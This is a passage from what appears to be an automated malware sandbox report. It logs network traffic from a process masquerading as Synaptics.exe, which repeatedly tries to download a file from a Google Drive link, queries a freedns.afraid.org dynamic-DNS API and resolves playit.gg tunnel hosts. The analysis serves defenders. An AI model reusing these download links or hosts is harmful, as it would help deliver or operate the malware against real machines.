                                                  Jan 26, 2022 02:41:48.043034077 CET8.8.8.8192.168.2.30x4ed3No error (0)saw4.playit.gg54.38.136.57A (IP address)IN (0x0001)
                                                  Jan 26, 2022 02:41:51.150513887 CET8.8.8.8192.168.2.30xa6c6No error (0)chivalrous-condition.auto.playit.ggsaw4.playit.ggCNAME (Canonical name)IN (0x0001)
                                                  Jan 26, 2022 02:41:51.150513887 CET8.8.8.8192.168.2.30xa6c6No error (0)saw4.playit.gg54.38.136.57A (IP address)IN (0x0001)

                                                  HTTP Request Dependency Graph

                                                  • docs.google.com
                                                  • freedns.afraid.org

                                                  HTTP Packets

                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  0192.168.2.349765142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                  TimestampkBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  1192.168.2.349766142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                  TimestampkBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  10192.168.2.349779142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                  TimestampkBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  11192.168.2.349778142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                  TimestampkBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  12192.168.2.349780142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                  TimestampkBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  13192.168.2.349781142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                  TimestampkBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  14192.168.2.34976869.42.215.25280C:\ProgramData\Synaptics\Synaptics.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Jan 26, 2022 02:40:41.833442926 CET1317OUTGET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1
                                                  User-Agent: MyApp
                                                  Host: freedns.afraid.org
                                                  Cache-Control: no-cache
                                                  Jan 26, 2022 02:40:42.046803951 CET1319INHTTP/1.1 200 OK
                                                  Server: nginx
                                                  Date: Wed, 26 Jan 2022 01:40:39 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  Vary: Accept-Encoding
                                                  X-Cache: MISS
                                                  Data Raw: 31 66 0d 0a 45 52 52 4f 52 3a 20 43 6f 75 6c 64 20 6e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 2e 0a 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 1fERROR: Could not authenticate.0


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  2192.168.2.349771142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                  TimestampkBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  3192.168.2.349770142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                  TimestampkBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  4192.168.2.349773142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                  TimestampkBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  5192.168.2.349772142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                  TimestampkBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  6192.168.2.349774142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                  TimestampkBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  7192.168.2.349775142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                  TimestampkBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  8192.168.2.349777142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                  TimestampkBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  9192.168.2.349776142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                  TimestampkBytes transferredDirectionData


                                                  HTTPS Proxied Packets

                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  0192.168.2.349765142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                  TimestampkBytes transferredDirectionData
                                                  2022-01-26 01:40:41 UTC0OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                  User-Agent: Synaptics.exe
                                                  Host: docs.google.com
                                                  Cache-Control: no-cache
                                                  2022-01-26 01:40:42 UTC0INHTTP/1.1 404 Not Found
                                                  Content-Type: text/html; charset=UTF-8
                                                  P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                  Content-Security-Policy: script-src 'nonce-h8PmNUY3Lxp2hZQHX+d9yQ' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/
                                                  Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]}
                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq"
                                                  Date: Wed, 26 Jan 2022 01:40:42 GMT
                                                  Expires: Wed, 26 Jan 2022 01:40:42 GMT
                                                  Cache-Control: private, max-age=0
                                                  X-Content-Type-Options: nosniff
                                                  X-Frame-Options: SAMEORIGIN
                                                  X-XSS-Protection: 1; mode=block
                                                  Server: GSE
                                                  Set-Cookie: NID=511=SSVn4-j59JXsTzxw847lfqJIID7zKof-Xkcxy3fnYPbOQF2K_rhItUDKpUam4CimsZa0ZkCNsNF-p5jihI9D9v5_JpNDmEeXc8nvpPuWdC1Y-5-xdpfIrOe7Xgo8_7k6NVyKXkeYW_T_LgorYz9SrXu0RFiFNl_tuUgPHfJZcdM; expires=Thu, 28-Jul-2022 01:40:41 GMT; path=/; domain=.google.com; HttpOnly
                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                  Accept-Ranges: none
                                                  Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site,Accept-Encoding
                                                  Connection: close
                                                  Transfer-Encoding: chunked
                                                  2022-01-26 01:40:42 UTC1INData Raw: 38 64 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 3c 48 32 3e 45 72 72 6f 72 20 34 30 34 3c 2f 48 32 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 0d 0a
                                                  Data Ascii: 8d<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Not Found</H1><H2>Error 404</H2></BODY></HTML>
                                                  2022-01-26 01:40:42 UTC1INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  1192.168.2.349766142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                  TimestampkBytes transferredDirectionData
                                                  2022-01-26 01:40:41 UTC0OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                  User-Agent: Synaptics.exe
                                                  Host: docs.google.com
                                                  Cache-Control: no-cache
                                                  2022-01-26 01:40:42 UTC1INHTTP/1.1 404 Not Found
                                                  Content-Type: text/html; charset=UTF-8
                                                  P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                  Content-Security-Policy: script-src 'nonce-MnbeCR+DLosHit1O26Q8ng' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/
                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq"
                                                  Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]}
                                                  Date: Wed, 26 Jan 2022 01:40:42 GMT
                                                  Expires: Wed, 26 Jan 2022 01:40:42 GMT
                                                  Cache-Control: private, max-age=0
                                                  X-Content-Type-Options: nosniff
                                                  X-Frame-Options: SAMEORIGIN
                                                  X-XSS-Protection: 1; mode=block
                                                  Server: GSE
                                                  Set-Cookie: NID=511=Z9NzJjnPWUitQLAoJHeuMMuo7U2KlbjEgRTwO6DBDzKkE9bNbTk7QrgaCNMw7qYQFNh3y6NAHppTjvVahiaNwwztWY1HVVfW-N_CaP8ut_6I2UiEdontaeBHy3IXTvLOy8WJyEVXH-OcRIRxCituWMrRoGdSseIThKXC76zDRX8; expires=Thu, 28-Jul-2022 01:40:41 GMT; path=/; domain=.google.com; HttpOnly
                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                  Accept-Ranges: none
                                                  Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site,Accept-Encoding
                                                  Connection: close
                                                  Transfer-Encoding: chunked
                                                  2022-01-26 01:40:42 UTC3INData Raw: 38 64 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 3c 48 32 3e 45 72 72 6f 72 20 34 30 34 3c 2f 48 32 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 0d 0a
                                                  Data Ascii: 8d<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Not Found</H1><H2>Error 404</H2></BODY></HTML>
                                                  2022-01-26 01:40:42 UTC3INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  10192.168.2.349779142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                  TimestampkBytes transferredDirectionData
                                                  2022-01-26 01:40:43 UTC16OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                  User-Agent: Synaptics.exe
                                                  Host: docs.google.com
                                                  Cache-Control: no-cache
                                                  2022-01-26 01:40:43 UTC16INHTTP/1.1 404 Not Found
                                                  Content-Type: text/html; charset=UTF-8
                                                  P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq"
                                                  Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]}
                                                  Content-Security-Policy: script-src 'nonce-RdHp+ZvfKKgbks87zRU3qw' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/
                                                  Date: Wed, 26 Jan 2022 01:40:43 GMT
                                                  Expires: Wed, 26 Jan 2022 01:40:43 GMT
                                                  Cache-Control: private, max-age=0
                                                  X-Content-Type-Options: nosniff
                                                  X-Frame-Options: SAMEORIGIN
                                                  X-XSS-Protection: 1; mode=block
                                                  Server: GSE
                                                  Set-Cookie: NID=511=myEvXuTvmjxcm4mnQp4ui8yq_pOmgMJXZ4qPt8sg5dP6BwW624u9fHxPm5SLfaDR1bn3DRtOVcQUmhGJb-8EKyJI7IqoDlJu-Yimrlw3LeFe0RflH1gxCzx21qwDBT5nfkHN9MrZplq9LIxFpB6oGRU1iePbOAj1ojcanT9iX_g; expires=Thu, 28-Jul-2022 01:40:43 GMT; path=/; domain=.google.com; HttpOnly
                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                  Accept-Ranges: none
                                                  Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site,Accept-Encoding
                                                  Connection: close
                                                  Transfer-Encoding: chunked
                                                  2022-01-26 01:40:43 UTC17INData Raw: 38 64 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 3c 48 32 3e 45 72 72 6f 72 20 34 30 34 3c 2f 48 32 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 0d 0a
                                                  Data Ascii: 8d<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Not Found</H1><H2>Error 404</H2></BODY></HTML>
                                                  2022-01-26 01:40:43 UTC18INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  11192.168.2.349778142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                  TimestampkBytes transferredDirectionData
                                                  2022-01-26 01:40:43 UTC16OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                  User-Agent: Synaptics.exe
                                                  Host: docs.google.com
                                                  Cache-Control: no-cache
                                                  2022-01-26 01:40:43 UTC18INHTTP/1.1 404 Not Found
                                                  Content-Type: text/html; charset=UTF-8
                                                  P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                  Content-Security-Policy: script-src 'nonce-5xU30urGcRrPcxntL4QFLA' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/
                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq"
                                                  Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]}
                                                  Date: Wed, 26 Jan 2022 01:40:43 GMT
                                                  Expires: Wed, 26 Jan 2022 01:40:43 GMT
                                                  Cache-Control: private, max-age=0
                                                  X-Content-Type-Options: nosniff
                                                  X-Frame-Options: SAMEORIGIN
                                                  X-XSS-Protection: 1; mode=block
                                                  Server: GSE
                                                  Set-Cookie: NID=511=IZ6IVToh4zcgc4x1sK0NAA7spP8dwoR3XdYssI9Pua_F_DpwrV1d7A2Lplg8ZiHtNOapGJdXunEw6OYhdWwZhh5BxFEnWLJm3lGH0S_UX5kgHKRMYqUNqOgw-QSKsMVLz69xPBGSBWDQ0g4zqPg2fWvSD6Mzlg5dqGcoGip1x00; expires=Thu, 28-Jul-2022 01:40:43 GMT; path=/; domain=.google.com; HttpOnly
                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                  Accept-Ranges: none
                                                  Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site,Accept-Encoding
                                                  Connection: close
                                                  Transfer-Encoding: chunked
                                                  2022-01-26 01:40:43 UTC19INData Raw: 38 64 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 3c 48 32 3e 45 72 72 6f 72 20 34 30 34 3c 2f 48 32 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 0d 0a
                                                  Data Ascii: 8d<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Not Found</H1><H2>Error 404</H2></BODY></HTML>
                                                  2022-01-26 01:40:43 UTC19INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  12192.168.2.349780142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                  TimestampkBytes transferredDirectionData
                                                  2022-01-26 01:40:43 UTC19OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                  User-Agent: Synaptics.exe
                                                  Host: docs.google.com
                                                  Cache-Control: no-cache
                                                  2022-01-26 01:40:43 UTC21INHTTP/1.1 404 Not Found
                                                  Content-Type: text/html; charset=UTF-8
                                                  P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq"
                                                  Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]}
                                                  Content-Security-Policy: script-src 'nonce-sPLIUksRvialjFnyjQevTQ' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/
                                                  Date: Wed, 26 Jan 2022 01:40:43 GMT
                                                  Expires: Wed, 26 Jan 2022 01:40:43 GMT
                                                  Cache-Control: private, max-age=0
                                                  X-Content-Type-Options: nosniff
                                                  X-Frame-Options: SAMEORIGIN
                                                  X-XSS-Protection: 1; mode=block
                                                  Server: GSE
                                                  Set-Cookie: NID=511=WFRHPG-cDuXn9NqSuf0VuWUkAVPh5GdWWBMC9Ru1r6X6fT83oiT3knyYXEyjiVM_qb89t-XLdImlV-942jaLFcvX5D8TlLCmy87ko9TMEaSPrPNdarZ8TaE063oXe5MvEO7vd0XWYuVzSFICtzlQxwzQzt7o0ltS-HOTCTQepZI; expires=Thu, 28-Jul-2022 01:40:43 GMT; path=/; domain=.google.com; HttpOnly
                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                  Accept-Ranges: none
                                                  Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site,Accept-Encoding
                                                  Connection: close
                                                  Transfer-Encoding: chunked
                                                  2022-01-26 01:40:43 UTC22INData Raw: 38 64 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 3c 48 32 3e 45 72 72 6f 72 20 34 30 34 3c 2f 48 32 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 0d 0a
                                                  Data Ascii: 8d<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Not Found</H1><H2>Error 404</H2></BODY></HTML>
                                                  2022-01-26 01:40:43 UTC22INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  13192.168.2.349781142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                  TimestampkBytes transferredDirectionData
                                                  2022-01-26 01:40:43 UTC19OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                  User-Agent: Synaptics.exe
                                                  Host: docs.google.com
                                                  Cache-Control: no-cache
                                                  2022-01-26 01:40:43 UTC19INHTTP/1.1 404 Not Found
                                                  Content-Type: text/html; charset=UTF-8
                                                  P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                  Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]}
                                                  Content-Security-Policy: script-src 'nonce-vjtjcs1W4e/lOQ1cPPxnLQ' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/
                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq"
                                                  Date: Wed, 26 Jan 2022 01:40:43 GMT
                                                  Expires: Wed, 26 Jan 2022 01:40:43 GMT
                                                  Cache-Control: private, max-age=0
                                                  X-Content-Type-Options: nosniff
                                                  X-Frame-Options: SAMEORIGIN
                                                  X-XSS-Protection: 1; mode=block
                                                  Server: GSE
                                                  Set-Cookie: NID=511=Vdgur68JofFWxSUhQckp8zV0Ef0ZTFKVUJ8d5I7w3wEVePra58Z4_uxGHewkEDv_U56WgYsIry6fzKCoIDq_XnVime8D9MZwNFwdrBRbEIFbenKPqF_DFmtRfk6NxThU8hv4EwxUkU88wcM1eVL3wKXNvecBnLUZFwUV5PX3e9Q; expires=Thu, 28-Jul-2022 01:40:43 GMT; path=/; domain=.google.com; HttpOnly
                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                  Accept-Ranges: none
                                                  Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site,Accept-Encoding
                                                  Connection: close
                                                  Transfer-Encoding: chunked
                                                  2022-01-26 01:40:43 UTC21INData Raw: 38 64 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 3c 48 32 3e 45 72 72 6f 72 20 34 30 34 3c 2f 48 32 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 0d 0a
                                                  Data Ascii: 8d<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Not Found</H1><H2>Error 404</H2></BODY></HTML>
                                                  2022-01-26 01:40:43 UTC21INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  2192.168.2.349771142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                  TimestampkBytes transferredDirectionData
                                                  2022-01-26 01:40:42 UTC3OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                  User-Agent: Synaptics.exe
                                                  Host: docs.google.com
                                                  Cache-Control: no-cache
                                                  2022-01-26 01:40:42 UTC5INHTTP/1.1 404 Not Found
                                                  Content-Type: text/html; charset=UTF-8
                                                  P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                  Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]}
                                                  Content-Security-Policy: script-src 'nonce-qUQ/asTtDE7He0Vml9HmZA' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/
                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq"
                                                  Date: Wed, 26 Jan 2022 01:40:42 GMT
                                                  Expires: Wed, 26 Jan 2022 01:40:42 GMT
                                                  Cache-Control: private, max-age=0
                                                  X-Content-Type-Options: nosniff
                                                  X-Frame-Options: SAMEORIGIN
                                                  X-XSS-Protection: 1; mode=block
                                                  Server: GSE
                                                  Set-Cookie: NID=511=GsvAX0t__-cMfTHedu1r9_YWhq8dTNOVby6k30MueLAVtOkLaQZHzdz00YyNq18rbdjPdyc0Y4iU6Kprz94a8dWdD6HYvujbvGXtTMbrJ3VWJ8_KcKALdwMx3u4pWl4yDWktspyOAhFbeHv2Cp3cvEGHz7ybCheljHi7wIYyQiw; expires=Thu, 28-Jul-2022 01:40:42 GMT; path=/; domain=.google.com; HttpOnly
                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                  Accept-Ranges: none
                                                  Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site,Accept-Encoding
                                                  Connection: close
                                                  Transfer-Encoding: chunked
                                                  2022-01-26 01:40:42 UTC6INData Raw: 38 64 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 3c 48 32 3e 45 72 72 6f 72 20 34 30 34 3c 2f 48 32 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 0d 0a
                                                  Data Ascii: 8d<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Not Found</H1><H2>Error 404</H2></BODY></HTML>
                                                  2022-01-26 01:40:42 UTC6INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  3192.168.2.349770142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                  TimestampkBytes transferredDirectionData
                                                  2022-01-26 01:40:42 UTC3OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                  User-Agent: Synaptics.exe
                                                  Host: docs.google.com
                                                  Cache-Control: no-cache
                                                  2022-01-26 01:40:42 UTC3INHTTP/1.1 404 Not Found
                                                  Content-Type: text/html; charset=UTF-8
                                                  P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                  Content-Security-Policy: script-src 'nonce-YXDM5qvdo8b2sWEK1L9uVw' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/
                                                  Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]}
                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq"
                                                  Date: Wed, 26 Jan 2022 01:40:42 GMT
                                                  Expires: Wed, 26 Jan 2022 01:40:42 GMT
                                                  Cache-Control: private, max-age=0
                                                  X-Content-Type-Options: nosniff
                                                  X-Frame-Options: SAMEORIGIN
                                                  X-XSS-Protection: 1; mode=block
                                                  Server: GSE
